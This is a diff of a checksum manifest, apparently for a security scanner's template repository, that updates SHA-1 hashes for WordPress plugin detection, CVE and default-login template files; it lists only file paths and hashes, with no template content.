helpers/wordpress/plugins/fast-indexing-api.txt:9179d5509f8564f9a9b7411a76b338ec2a3b721c @@ -797,7 +797,7 @@ helpers/wordpress/plugins/fluentform.txt:62816587b37c8a986e8470456cb1ccaca418bd3 helpers/wordpress/plugins/font-awesome.txt:24081282f3a9a62c341308c388d8ed137057665d helpers/wordpress/plugins/force-regenerate-thumbnails.txt:8bff12eeb621c3f4c18ae1d2809b3860778910f4 helpers/wordpress/plugins/formidable.txt:309bd303ec4d8c564bacf4b39075aa7866dcdea4 -helpers/wordpress/plugins/forminator.txt:4069b806e5d27e95685e8ab99e1322abd02eb9d4 +helpers/wordpress/plugins/forminator.txt:6ee02b82336e55125a24970b177a069b10306436 helpers/wordpress/plugins/ga-google-analytics.txt:a0dab5f80a9088edfc02fe1a85d2d833a5c55075 helpers/wordpress/plugins/gdpr-cookie-compliance.txt:2f4af87dfd67a2385a4e30cfbd4d57d669853135 helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt:bc9981e1c7ebf53d15d8cf9698c2bb6137881fc9 @@ -824,7 +824,7 @@ helpers/wordpress/plugins/instagram-feed.txt:08d2e98e6754af941484848930ccbaddfef helpers/wordpress/plugins/intuitive-custom-post-order.txt:d1fd48333115227b181b4b132e5511e91d95bea5 helpers/wordpress/plugins/iwp-client.txt:6c3371737e84ab4219f83867466569f042741c0c helpers/wordpress/plugins/jetpack-boost.txt:6296d4732b242d110df8dee2fc52e75587f5910b -helpers/wordpress/plugins/jetpack.txt:a861c6358fded34510ab1962eb66230220d77942 +helpers/wordpress/plugins/jetpack.txt:60a854f8bf5e45303554786e4d93e54911b7eb31 helpers/wordpress/plugins/kadence-blocks.txt:ff9c051b520ac807402f74294d9ef63ab68c6b88 helpers/wordpress/plugins/kirki.txt:9640fdbbae3c8e8f74e96e656f485284e8f8ed9d helpers/wordpress/plugins/leadin.txt:d4a4068d21627778d982b009ccde0601fc6647b8 @@ -836,13 +836,13 @@ helpers/wordpress/plugins/loginizer.txt:83057b5c2ba4158be4c360919fba39e92c0cd3ca helpers/wordpress/plugins/loginpress.txt:4ea93c6a1e320054f99d66f428e611b31355cd92 helpers/wordpress/plugins/mailchimp-for-woocommerce.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/mailchimp-for-wp.txt:0ef6ca3504757e440dbb7f74dfc7956540130d09 -helpers/wordpress/plugins/mailpoet.txt:fd472fd4593f0ae02f0d647f5e9dd1d4684d4536 +helpers/wordpress/plugins/mailpoet.txt:49c2b48e15e5e7f6c4cdd7b50db59c6c027c27a5 helpers/wordpress/plugins/maintenance.txt:2a43381575a9307e0a57dabb66f98b0c79dfa944 helpers/wordpress/plugins/mainwp-child.txt:6746a82081d852d58b152584407d5b80d3ac43f3 helpers/wordpress/plugins/malcare-security.txt:ba9db54a3e9b0df9d1362a546f3b3e62f1aa032c helpers/wordpress/plugins/megamenu.txt:054dae9d64c38d76a066c981fbdab975b1abbf53 helpers/wordpress/plugins/members.txt:2beef4f1a38f9db1c05a1e49977c956626624d66 -helpers/wordpress/plugins/meta-box.txt:193731126fc28e1c2848ea069e492a3a46c5fcf4 +helpers/wordpress/plugins/meta-box.txt:55193864c8fe639aac62a66b52b3b102397e0cf9 helpers/wordpress/plugins/metform.txt:714503a3af828a0db664fd44681d548aba3ee3a7 helpers/wordpress/plugins/ml-slider.txt:80ed6599146b54137db225fcbb582290d8512149 helpers/wordpress/plugins/newsletter.txt:806b01f722148eb1b6ddf37464ad8f18232e6422 @@ -865,7 +865,7 @@ helpers/wordpress/plugins/popup-builder.txt:8b367cc24dc19d310f9af1157021067beef7 helpers/wordpress/plugins/popup-maker.txt:c25ed33c251bfc15583cad11462f17a56e46989d helpers/wordpress/plugins/post-smtp.txt:aecdd619817528f6e7764e982d8df1aafa8a7175 helpers/wordpress/plugins/post-types-order.txt:f243f3446bb1226eacba3cdb8b904ef729d6ec9d -helpers/wordpress/plugins/premium-addons-for-elementor.txt:e84ad28997bf6ae8ece163b8b89ecd5f073ccae6 +helpers/wordpress/plugins/premium-addons-for-elementor.txt:e95d97da8a2ce341d64e208ea599b9a4c7584ef9 helpers/wordpress/plugins/pretty-link.txt:e45ae12a7326100f6ce5fbc5ad2c1260c5d71d13 helpers/wordpress/plugins/really-simple-captcha.txt:ce0d88c5002b6cf7664052f1fc7d652cbdadccec helpers/wordpress/plugins/really-simple-ssl.txt:d97823538c9ba6289bac6fea78445ad90770264d @@ -919,12 +919,12 @@ helpers/wordpress/plugins/woocommerce-legacy-rest-api.txt:6288dca36116a23967560d helpers/wordpress/plugins/woocommerce-payments.txt:373a109947826f162ef5dba14dc054105c72c5ca helpers/wordpress/plugins/woocommerce-paypal-payments.txt:036622d5a32b0e5099f20d8cff7515dc042253aa helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:a16cd18f1019f04b207109b189b504edbde41ab2 -helpers/wordpress/plugins/woocommerce-services.txt:b6ed966424606782d1fc2f9032f0fb0e4d237bd7 +helpers/wordpress/plugins/woocommerce-services.txt:09d7c94b6b07df41fc11fe17f108ad704d3a058e helpers/wordpress/plugins/woocommerce.txt:ef9896bae39c1e3999a9f105466cc1f7814021a7 helpers/wordpress/plugins/woosidebars.txt:a2048abb201b6201e7cd25e8b0262758a98d59da helpers/wordpress/plugins/wordfence.txt:40c453bafd4ebdb4a4b38416eb90fd03d3073fc3 helpers/wordpress/plugins/wordpress-importer.txt:d195b61caef74dab647d06101869c0863fff7a69 -helpers/wordpress/plugins/wordpress-seo.txt:09c7dcd2ea357796d879b24eb2600e9964417379 +helpers/wordpress/plugins/wordpress-seo.txt:e897fca0b3c8ab2a2a6dfca6e49d92a8ba550aaa helpers/wordpress/plugins/worker.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/wp-fastest-cache.txt:0489698a3b78229a8b5df0f360850ce63827cf67 helpers/wordpress/plugins/wp-file-manager.txt:8c4e6ce593239d9464a2d3eb48692924898625be @@ -3410,7 +3410,7 @@ http/cves/2024/CVE-2024-2621.yaml:5b501a9ff0e69b8bfd0df0caaf97ebbaaba51301 http/cves/2024/CVE-2024-26331.yaml:1f13e279312f16452413eae02b0cb32971d720f8 http/cves/2024/CVE-2024-27198.yaml:428b5bbb2a88c48db434e13c0fdc3dea195f4a6f http/cves/2024/CVE-2024-27199.yaml:6004f38f3a24fbb3a951270191c4af21b6e14e2d -http/cves/2024/CVE-2024-27292.yaml:8766a9ddb81c0c5be3dd8d9e74d7a3e109e160a0 +http/cves/2024/CVE-2024-27292.yaml:eaabcbabd58bca44e0de0cb44bdc329b88986f76 http/cves/2024/CVE-2024-27348.yaml:6af6e5ad3b0eae4fa48d1937d51d5a5b767395b5 http/cves/2024/CVE-2024-27497.yaml:b898a9ccd9f6528a3d1ad4b1b9660b12752104e1 http/cves/2024/CVE-2024-27564.yaml:0b9367bff756ebc5d7db5a742305272ac13f37b1 @@ -3573,7 +3573,7 @@ http/default-logins/leostream/leostream-default-login.yaml:b478948b507e476bd490b http/default-logins/lucee/lucee-default-login.yaml:1f77fa884b48e3e147c00290ceedb09037d1ba49 http/default-logins/lutron/lutron-default-login.yaml:03cca82eae76164ef0f6576423f6a1499eb7a1a3 http/default-logins/magnolia-default-login.yaml:f1d27055c0c45da07e214e7cb2b677fe2808c919 -http/default-logins/mantisbt/mantisbt-anonymous-login.yaml:d4bb3fd58c2ab9126e15f269838104570a33625a +http/default-logins/mantisbt/mantisbt-anonymous-login.yaml:d70bf1c77e73b5eeee82b4b8491b04e3f9522df1 http/default-logins/mantisbt/mantisbt-default-credential.yaml:30f4e0ea9fb36172667235072e61ef734891ac9a http/default-logins/minio/minio-default-login.yaml:f832e9adbba186536407af73fbba5e55b73cf0d8 http/default-logins/mobotix/mobotix-default-login.yaml:e1ae410268e501412f31b614dc1f1194bb22f318 @@ -7237,228 +7237,228 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:c54773933fdcfb49dbf7ba37f9e1fc2db61329b9 -http/technologies/wordpress/plugins/add-to-any.yaml:eaecc5943e78b6bfd7f9694316a161ba3f66b860 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:54cc5f9c1cc6247945805f518a489436fedd7a65 +http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 +http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:7aae85203251bb0f3494157df3eab53676666a2a -http/technologies/wordpress/plugins/akismet.yaml:5455e09020dd300aeabf17c3be38c8eca843865c +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d +http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:81928069f6af1766f8b493be300abc29f5bed07c -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4c5f300d2a8e769a4405634001605c580aaf582e -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:1e96ef96febb08fc1ca690e54c4a6632e417d077 -http/technologies/wordpress/plugins/amp.yaml:6d02179c58b20f4d8ad9285e6fb99d7852ecfa17 -http/technologies/wordpress/plugins/antispam-bee.yaml:b9a0de1422ef2e13b3026401a0ea0d301f308993 -http/technologies/wordpress/plugins/astra-sites.yaml:fb5ef40ea3d9c5b55ef65c01aab287aadf6c1b54 +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 +http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 +http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c +http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:b1b500e8f5d50f192a8b06d3159fb94b18906532 -http/technologies/wordpress/plugins/backwpup.yaml:be1af754a2c8fd3b91bfecbc48767f0a2ff180ea -http/technologies/wordpress/plugins/better-search-replace.yaml:f0ad7bce917360394d9f883930cdd2d27549241e -http/technologies/wordpress/plugins/better-wp-security.yaml:d0e92fae13c4c9f95f2a7d16846baed127ef9690 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:69417b2807cf59d63c67de08b92b320f85e47f1f -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:2fa2b1b3241c6ca8ce134fabbd8b207b6d3c3775 -http/technologies/wordpress/plugins/breeze.yaml:4ec57e4fefec2c9b4c398f412db5ca59a7015d65 -http/technologies/wordpress/plugins/broken-link-checker.yaml:f78828b3fbb4b4226562e6d7acd6a227dd7b2443 -http/technologies/wordpress/plugins/chaty.yaml:864504fa235a453bc49bd7a711f832755bf8f309 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:2626556f7142916089ab0b120beaa9c3cc302cf0 -http/technologies/wordpress/plugins/classic-editor.yaml:03e4778a0834f0bcfe63538f65f3c6835aa43b40 -http/technologies/wordpress/plugins/classic-widgets.yaml:9598bb931c11c9e4714437ad9b41f448d1579f5f -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:35347f72288514982d3c41a085b9bca7f4d613c4 +http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 +http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 +http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 +http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 +http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 +http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba +http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff +http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d +http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 +http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:56d58b98c3fe7753544af6a33ac3b31ae3aa840b -http/technologies/wordpress/plugins/coblocks.yaml:f7c63ccc132f12c2c0e3ae0de8e55989a863cdf4 -http/technologies/wordpress/plugins/code-snippets.yaml:93561cd33bacd1363c88bb59b13f755ef7fda8a2 -http/technologies/wordpress/plugins/coming-soon.yaml:219762004ba773ef7ec9081042f374682f1a4b04 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:2abf82f0a38c6e7facd374a027b65ea4ee0826a0 -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:625975627800cf86177e1874e7580db1fb24e948 -http/technologies/wordpress/plugins/contact-form-7.yaml:e91c65a9faed14796f0a49be4294a2a5d8567c37 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:005a65ac23b9ad192a5ae1f8b424cde911830d80 -http/technologies/wordpress/plugins/cookie-law-info.yaml:132c249d68656b320880fa1187f6e9c49f3324ae -http/technologies/wordpress/plugins/cookie-notice.yaml:b5389deb4ba5f39bcd30bb34eddd49246beb487e -http/technologies/wordpress/plugins/copy-delete-posts.yaml:3a8633b7ab3776572da975475091cfaa2a20b971 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:88737b0fa1f3b36fc803cc6e2e98a4fe7ea90161 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9b190b5561a7f3cffe5c12bf68843ee19ff61bd1 -http/technologies/wordpress/plugins/custom-css-js.yaml:7d2b05c180a3937e83e9e3a49569a67eabeb6af8 -http/technologies/wordpress/plugins/custom-fonts.yaml:d1267254cdaafd391922250d2ee1065d3d033342 -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e0eb3544ea64fe169ddf051418f3680577582422 -http/technologies/wordpress/plugins/disable-comments.yaml:dcb3ddf368211f3bea8b97f2d1e6cc711ad7dfd9 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:d1946f471cf622db86e24e87ff009f61aa09525d -http/technologies/wordpress/plugins/duplicate-page.yaml:b24bb3260543cbaa13ccd9518c78c1610863b609 -http/technologies/wordpress/plugins/duplicate-post.yaml:2a79fec4b12076502b8e7de7ce0504f9c8fb9ee4 -http/technologies/wordpress/plugins/duplicator.yaml:972f69cd6d9e10f3878bc96f80b3f86fa10c457a -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:a6dbb3bebc449f572d3a135fc5d595568808a63a +http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 +http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d +http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c +http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d +http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 +http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 +http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 +http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c +http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 +http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c +http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 +http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 +http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e +http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:88bc95a56aaaedbe8f1ba7a827e91ea2aaeac009 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:378d65225affc130cf6838c57d84252eecbff19e -http/technologies/wordpress/plugins/elementor.yaml:dbc00c3b79733ae31cc8891e670c5c4326ca11a4 -http/technologies/wordpress/plugins/elementskit-lite.yaml:d145fac60e8417f0eb98b16a96ebecfaa57b0774 -http/technologies/wordpress/plugins/enable-media-replace.yaml:45dbdc7e8d165732abcd0cee10e207535820796f -http/technologies/wordpress/plugins/envato-elements.yaml:82495933d246cf14f003d78cc83c6fc56f79b40e -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:aa8d12ab140f54418742e1578d5b1a268291ae20 -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:beaa3cf80dd1e33545be8a3f3cf0917ce9d21106 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:e0ae6bb7fe963da55d421bf5ab56a1f605486886 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:122c138fb18849e95ac6a3d71d31405ec53b3b75 -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:6fa9e6c05cde8d3e5e88afac6da676f741d2f079 -http/technologies/wordpress/plugins/flamingo.yaml:8c7b2c1d7e91b0bb4e9d74547bed04230a6b163c -http/technologies/wordpress/plugins/fluentform.yaml:24f0293b05de2f0528921eb895f5d8a37cb1775f -http/technologies/wordpress/plugins/font-awesome.yaml:a2e28d211f784f141e3a73317a18fa993f62b277 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:9819f5eae200f396e290810f83ded543754bb7dc -http/technologies/wordpress/plugins/formidable.yaml:5b593621f59c0eed5b7fbf9bb9795c644d0bdfb6 -http/technologies/wordpress/plugins/forminator.yaml:e9241918fdfc9e9a66f24f3a3ed48e17f424f020 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:ef22367a263c05ebc06e7ede1c27e5a641de9891 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:ec85802104e65ebc4363ebe105658c5930bb0122 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:f9bfc7eb3700d158c70236878f3f2ec592c14a5a -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:c33d421bb8c810833a8efcacc5b3149c0fe81722 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:7c0194fea74d3313b5766c6a78e9cb4f12991db0 -http/technologies/wordpress/plugins/google-site-kit.yaml:ee56e3f9267691f664cfb1d79b2069dd3d43884a -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f8f40b43ba066c021d9469081d0f4fc648fd2427 -http/technologies/wordpress/plugins/gtranslate.yaml:e093d916ff643bc71472b7ce0184a0d1fb74a237 -http/technologies/wordpress/plugins/gutenberg.yaml:18e1f4863c283cf9dc2fd2cd6f135d41dba0dff1 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:9b568be2e06bd21b557990624ab48bf993b10148 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 +http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 +http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 +http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d +http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc +http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 +http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 +http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 +http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e +http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 +http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa +http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 +http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 +http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:962d2727dfa399c1558f33d3b35062e7a8dd6ef2 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:e4f72dd5ae171713751f7be33130a03e5f36f966 -http/technologies/wordpress/plugins/header-footer.yaml:e0c9639c3a960871260bccf3e06d250b9f10a1c5 -http/technologies/wordpress/plugins/health-check.yaml:44da5a76b6e9bcee78f245f6f8317917cd7df1da -http/technologies/wordpress/plugins/hello-dolly.yaml:bb9c2310e49c513c9d0273d4507c9bac10207c0e -http/technologies/wordpress/plugins/host-webfonts-local.yaml:8bff3512c1b069179f0d8d2799f66ebfa23b47a2 -http/technologies/wordpress/plugins/hostinger.yaml:fcd5fc6fa4ba0a5e3caa6be12c80bab1194ef6e0 -http/technologies/wordpress/plugins/image-optimization.yaml:87f1fa2c2441d0b349cad2c83e17e7a02d69c66d -http/technologies/wordpress/plugins/imagify.yaml:d81f7016ff017883205f389ce36c8b2eae22cae5 -http/technologies/wordpress/plugins/imsanity.yaml:10a1a8dbde98dd46ca668c1ad02810a569e474f1 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:7df8b4fdd7f2c910c8893077b39e4301c5158b59 -http/technologies/wordpress/plugins/instagram-feed.yaml:37c3a1b025eebe25cf9fd0054a47bf604936cba3 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:f7bf25dc050e1b8fe2543c0291b499949e27b67e +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d +http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf +http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 +http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 +http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 +http/technologies/wordpress/plugins/image-optimization.yaml:12b0b8d10e65946e41142eb6a461eb801e925582 +http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff +http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 +http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:79a449e90256aedd5e93bef3d3f5a3e221cdd630 -http/technologies/wordpress/plugins/jetpack.yaml:3f0155e37abb46543acc9335f5fb6690e9aed7e5 -http/technologies/wordpress/plugins/kadence-blocks.yaml:a916400055ade33076cba026249b44731db5c117 -http/technologies/wordpress/plugins/kirki.yaml:f8f4189d5c9d235a505da5a77b55369c5399bf7a -http/technologies/wordpress/plugins/leadin.yaml:729b718818d4ef66745b71e2864daa03b4b7b427 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:58de4d30dab0f1642fa00da78fc4473f9c941556 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:58f8d5d41c3160653210ff6c9face085c6e0c3ee -http/technologies/wordpress/plugins/litespeed-cache.yaml:5b311ec0deb23b9923edcfd4d87da2b264fc465c -http/technologies/wordpress/plugins/loco-translate.yaml:3f20e9face7c8e5b484e59afa1d0fbf673524144 -http/technologies/wordpress/plugins/loginizer.yaml:db2ba6f661f90d62c41abaaabd3b576260e148d7 +http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f +http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 +http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a +http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc +http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 